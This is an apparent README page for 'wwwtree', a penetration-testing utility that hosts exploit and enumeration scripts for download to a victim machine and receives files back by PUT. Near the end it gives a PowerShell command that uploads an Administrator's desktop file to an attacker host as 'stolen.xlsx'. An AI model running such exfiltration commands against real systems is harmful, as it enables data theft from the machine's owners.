Wwwtree Save

A utility for quickly and easily locating, web hosting and transferring resources (e.g., exploits/enumeration scripts) from your filesystem to a victim machine during privilege escalation.

Project README

wwwtree

Python License

Purpose

A utility for quickly and easily locating, web hosting and transferring resources (e.g., exploits/enumeration scripts) from your filesystem to a victim machine during privilege escalation.

Video Presentation

https://www.youtube.com/watch?v=iog-eb_N0Hg

Preview

image

Description

wwwtree does the following:

  • hosts a specified root directory and prints the contents in a tree-like format. Every file is translated to it's equivalent server URL path so you can quickly copy it and use a web client to transfer it to the victim.
  • Filters out files that contain specific substrings based on user provided keywords (use -k to parse comma seperated values). Handy for quickly locating resources saved in deep and populated directory structures.
  • Automatically hides from the output files and folders that are most likely not in the scope of enumeration / exploitation (e.g., txt, yml, docx files or .git directories). You can control this behaviour by editing the list variables hide_extensions and hide_dirs in the source.
  • The wwwtree python http server handler supports PUT requests and by default saves files in /tmp (you can change that in the source). You can use it to transfer files from the victim to the attacker machine.

Installation & Usage

git clone https://github.com/t3l3machus/wwwtree
cd ./wwwtree
pip3 install -r requirements.txt
chmod +x wwwtree.py

wwwtree.py [-h] -r ROOT_PATH -i INTERFACE [-l LEVEL] [-p PORT] [-k KEYWORDS] [-A] [-q]

PUT Requests

I've noticed that curl on Windows seems to work improperly when trying to transfer large files. Powershell's Invoke-WebRequest works much better:

powershell -c "invoke-webrequest -method PUT -headers @{'Content-Type'='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'} -usebasicparsing -uri http://192.168.111.135/stolen.xlsx -body (get-content C:\Users\Administrator\Desktop\some_file.xlsx)"
Open Source Agenda is not affiliated with "Wwwtree" Project. README Source: t3l3machus/wwwtree
Stars
171
Open Issues
0
Last Commit
1 year ago
Repository
License
MIT

Open Source Agenda Badge

Open Source Agenda Rating